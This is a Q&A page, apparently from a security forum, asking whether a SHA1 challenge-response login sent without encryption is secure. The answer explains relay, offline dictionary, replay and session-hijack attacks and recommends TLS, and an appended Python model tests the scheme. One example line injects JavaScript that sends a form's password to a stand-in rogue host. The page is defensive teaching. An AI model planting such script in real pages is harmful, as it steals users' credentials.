Web Authentication - how to securely transfer username/password from the client to the server


Question

I have a web application (Java) that I am trying to launch. The user needs to login to the system to use the features. So there are two parts to this application:
1) User Registration
2) Login
My concern is how secure is my method of transferring username/password data from the web browser to the server.

I am very lost on this one as I am not really sure how to securely send data from the web browser to the server.

I have the following setup:

<< Client >> ------------------------------------------------------<< Server >>
[Request a token] ------------------------------------------------------------->>
<<--------------[Sends a randomly generated token from the session ID]
[Client Computes hashedSecret = SHA1(token + SHA1(password))]
[Send Array:[username, hashedSecret]]----------------------------------->>
[Server queries SHA1(password) for username from the database]
[Server computes expectedSecret = SHA1(token + SHA1(password))]
[Server compares hashedSecret with expectedSecret]


What I would like to know is how to securely register users and if my login is secure enough.

Thanks

Recommended answer

Whether it is "secure enough" is, of course, something only you can answer as the system owner. If your expected adversary is unskilled and unmotivated, and the impact of an authentication failure is low, then it is. If you are protecting anything of significant value, then it probably is not a sufficiently secure solution.

Here are a few attack vectors to which this approach would likely be vulnerable.

Man-in-the-middle attack:

 Client          Eavesdropper            Server
 Requests token-------X----------------------->
 <--------------------X-------------Sends token
 Sends PW hash--------X
                      Relays client hash ------>
                      X<-----------Authenticates

An eavesdropper listens for the client's authentication response, and then relays it to the server. The server verifies its correctness and authenticates the eavesdropper.

Offline password hash attack

An eavesdropper who can read messages between the client and server will have the token and the logic (from the JavaScript) used to generate the hash. Thus, the attacker will know H(token + H(password)), token, and H(x) where H is the cryptographic hash algorithm (SHA1).

The attacker can then run a dictionary attack against the client response to guess the password, where the attacker can attempt to crack the password offline using dictionary attacks and similar methods. Since the attacker does not need to authenticate against the server but can rather crack the password offline, moderately weak passwords can be quickly cracked.

Modification of server messages in transit

The client has no assurance of the integrity of the server's messages, and the messages can potentially be modified in transit. For instance, a malicious intermediary can insert a line of JavaScript into the HTML page that intercepts the password through the DOM and sends it to a rogue server. (A rogue intermediary might, for example, insert new Image().src='http://www.rogueserver.xy/a.gif?password=' + document.forms[0].password.value into the form submit method.)

Replay attack

If the server tokens repeat with sufficient frequency, an eavesdropper can capture a successful token/response pair. The attacker can then make a large number of token requests, waiting for a known token to be recycled. The attacker then replays the known token response to the server. The server compares the attacker's response against the expected response and authenticates the attacker.

Post-authentication attacks

After the session is authenticated, client and server messages continue to be sent in cleartext. The attacker might conduct a session hijacking attack, using the client's session cookie to pose as the authenticated client. The attacker might also intercept confidential data between the server and client, or change data in transit, compromising the confidentiality, integrity, and non-repudiation of the client/server communication. For instance, the client might send a response to perform BenignAction, which the attacker changes in transit to GetSecretData. The attacker then reads the response ostensibly containing secret data.

This is all to say that the proposed method may not be much more secure than sending the password in clear text. If security is a concern, using SSL with a certificate from a trusted CA would (for practical intents) effectively prevent all of these attacks.
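The exchange from the question and two of the answer's points (the replay attack and the offline dictionary attack), modelled end to end as an added example; this is not code from the question, the answer or the asker's application. The server side is written so that tokens come from a CSPRNG and are single-use, which is an assumed fix for the replay case rather than the scheme the asker described (tokens "from the session ID"). The credential store, the user name and the password are constructed sample values, and the hash names follow the page: H is SHA1 and hashedSecret = SHA1(token + SHA1(password)).

```python
import hashlib
import hmac
import secrets


def sha1_hex(data: str) -> str:
    """The page's H(x): SHA1 over the UTF-8 bytes of a string, hex encoded."""
    return hashlib.sha1(data.encode("utf-8")).hexdigest()


# Constructed credential store in the form the question describes:
# the server keeps SHA1(password) per user name. Sample values only.
USER_DB = {"alice": sha1_hex("correct horse")}


class Server:
    """Server side of the challenge-response scheme.

    Assumption (not the asker's design): tokens are random and single-use,
    so a captured (token, response) pair is rejected when re-sent.
    """

    def __init__(self, user_db):
        self.user_db = user_db
        self.outstanding = set()  # tokens issued but not yet consumed

    def issue_token(self) -> str:
        token = secrets.token_hex(16)  # 128 bits from the OS CSPRNG
        self.outstanding.add(token)
        return token

    def verify(self, username: str, token: str, hashed_secret: str) -> bool:
        # Reject tokens the server never issued or has already consumed.
        if token not in self.outstanding:
            return False
        self.outstanding.discard(token)
        stored = self.user_db.get(username)  # SHA1(password) from the database
        if stored is None:
            return False
        expected = sha1_hex(token + stored)  # expectedSecret
        # Constant-time comparison avoids leaking how many hex digits matched.
        return hmac.compare_digest(expected, hashed_secret)


def client_response(token: str, password: str) -> str:
    """Client computes hashedSecret = SHA1(token + SHA1(password))."""
    return sha1_hex(token + sha1_hex(password))


def login(server: Server, username: str, password: str):
    """Run one full exchange. Returns (accepted, transcript), where the
    transcript is exactly what an eavesdropper on the cleartext link sees."""
    token = server.issue_token()
    hashed_secret = client_response(token, password)
    accepted = server.verify(username, token, hashed_secret)
    transcript = {"username": username, "token": token, "hashedSecret": hashed_secret}
    return accepted, transcript


def replay(server: Server, transcript: dict) -> bool:
    """Re-send a previously captured response unchanged (the answer's replay case)."""
    return server.verify(transcript["username"], transcript["token"], transcript["hashedSecret"])


def transcript_confirms_guess(transcript: dict, candidate_password: str) -> bool:
    """The answer's offline point: the token, the response and the public
    function H are all in the transcript, so a password guess can be checked
    without ever contacting the server. Transport encryption is what denies
    an eavesdropper this transcript in the first place."""
    return client_response(transcript["token"], candidate_password) == transcript["hashedSecret"]


def demo() -> dict:
    server = Server(USER_DB)
    ok, transcript = login(server, "alice", "correct horse")
    wrong, _ = login(server, "alice", "wrong password")
    return {
        "login_ok": ok,
        "wrong_password_accepted": wrong,
        "replay_accepted": replay(server, transcript),
        "offline_check_succeeds": transcript_confirms_guess(transcript, "correct horse"),
    }


if __name__ == "__main__":
    print(demo())
```

Single-use random tokens close only the replay case. They do nothing against the relay in the answer's first diagram, where the eavesdropper forwards a live response, nor against the offline check, which needs no token reuse at all; the transcript alone is enough, which is why the answer lands on TLS with a certificate from a trusted CA rather than a stronger client-side hash.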
